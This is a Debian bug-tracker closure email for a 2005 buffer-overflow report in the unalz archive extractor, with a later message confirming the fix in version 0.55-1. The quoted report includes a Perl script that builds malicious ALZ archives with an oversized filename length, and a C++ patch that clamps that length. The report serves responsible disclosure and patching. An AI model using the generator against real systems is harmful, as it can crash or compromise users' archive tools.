Your message dated Sat, 17 Jun 2006 11:43:39 +0200 with message-id <20060617094339.GA309@uio.no> and subject line Bug#340842 acknowledged by developer (Re: unalz: buffer overflow when extracting archives) has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database)
--- Begin Message ---
- To: submit@bugs.debian.org
- Subject: unalz: buffer overflow when extracting archives
- From: Ulf Harnhammar <metaur@telia.com>
- Date: Sat, 26 Nov 2005 11:38:07 +0100
- Message-id: <20051126103807.GA12158@localhost.localdomain>
- Reply-to: metaur@telia.com
Subject: unalz: buffer overflow when extracting archives Package: unalz Version: 0.52-1 Severity: grave Justification: user security hole Tags: security patch sarge etch sid Hello, I have found a buffer overflow security vulnerability in unalz. It occurs when it extracts malicious ALZ archives. I have attached the archives oflow333.alz (for sarge) and oflow1621.alz (for testing and unstable), as well as the program alzgen.pl that generated them and a patch that corrects this issue. It is also possible to upgrade to the latest upstream version 0.53, which also corrects it. // Ulf Härnhammar, Debian Security Audit Project -- System Information: Debian Release: testing/unstable APT prefers testing APT policy: (500, 'testing') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.12-1-686 Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1) Versions of packages unalz depends on: ii libc6 2.3.5-8 GNU C Library: Shared libraries an ii libgcc1 1:4.0.2-2 GCC support library ii libstdc++6 4.0.2-2 The GNU Standard C++ Library v3 unalz recommends no packages. -- no debconf informationAttachment: oflow333.alz
Description: Binary dataAttachment: oflow1621.alz
Description: Binary data#!/usr/bin/perl -- # alzgen # by Ulf Harnhammar in 2005 # I hereby place this program in the public domain. die "usage: $0 <length> <filename>\n" unless @ARGV == 2; $len = shift; $lenhi = int($len / 256); $lenlo = $len - ($lenhi * 256); $file = shift; open(OUT, ">$file") or die "can't open file!\n"; print OUT "\x42\x4c\x5a\x01" . # SIG_LOCAL_FILE_HEADER chr($lenlo) . chr($lenhi) . # filename length "\x00" x 7 . 'U' x $len; close OUT or die "can't close file!?!?\n";--- UnAlz.cpp.old 2004-11-25 07:23:36.000000000 +0100 +++ UnAlz.cpp 2005-11-20 01:04:23.000000000 +0100 @@ -359,6 +359,8 @@ return FALSE; } FRead(zipHeader.fileName, zipHeader.head.fileNameLength); + if(zipHeader.head.fileNameLength > MAX_PATH - 5) + zipHeader.head.fileNameLength = MAX_PATH - 5; zipHeader.fileName[zipHeader.head.fileNameLength] = (CHAR)NULL;
--- End Message ---
--- Begin Message ---
- To: Steve Langasek <vorlon@debian.org>
- Cc: Ulf Harnhammar <metaur@operamail.com>, 340842-done@bugs.debian.org
- Subject: Re: Bug#340842 acknowledged by developer (Re: unalz: buffer overflow when extracting archives)
- From: "Steinar H. Gunderson" <sgunderson@bigfoot.com>
- Date: Sat, 17 Jun 2006 11:43:39 +0200
- Message-id: <20060617094339.GA309@uio.no>
- In-reply-to: <20060316183533.GE3336@mauritius.dodds.net>
- References: <20060316174449.F20FA43A3B@ws5-1.us4.outblaze.com> <20060316183533.GE3336@mauritius.dodds.net>
Version: 0.55-1 On Thu, Mar 16, 2006 at 10:35:33AM -0800, Steve Langasek wrote: >> It still looks closed (in all versions) to me. Are you sure that that is >> what you want, instead of - say - fixing it? > http://bugs.debian.org/cgi-bin/pkgreport.cgi?src=unalz&dist=unstable This was fixed in a QA upload a while ago (0.55-1), since upstream 0.53 fixed it; the changelog missed it, though. I've verified that the code does indeed contain the patch given in the patch log, so I'm marking it as closed. /* Steinar */ -- Homepage: http://www.sesse.net/
--- End Message ---